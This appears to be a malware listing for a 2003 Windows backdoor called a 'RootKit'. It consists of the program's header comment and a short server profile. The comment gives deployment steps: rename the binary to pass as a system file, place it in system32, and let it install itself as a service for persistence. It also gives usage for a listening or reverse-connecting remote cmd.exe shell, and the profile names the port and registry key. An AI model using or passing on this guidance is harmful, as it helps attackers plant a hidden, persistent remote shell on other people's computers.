by Christophe Devine
Written in C, Source included
Released in October 2003
/*
 *  Win32 RootKit - cmd.exe remote shell backdoor
 *  (c) 2003 Christophe Devine
 *  Distributed for educational purposes only!
 *
 *  Before running ntbindshell.exe, rename it to
 *  "rsmss.exe" and copy it into %windir%\system32.
 *  This program will automatically register itself
 *  as a system service the first time it is run,
 *  provided it has the required privileges.
 *
 *  To remove the service, start Regedit and delete
 *  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
 *  Services\RSMSS, then reboot the computer.
 *
 *  Backdoor usage:
 *
 *  normal (listen) mode: rsmss <port>
 *  reverse-connect mode: rsmss <port> <host>
 */
Server:
size: 24.576 bytes
port: 26103 TCP
startup: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RSMSS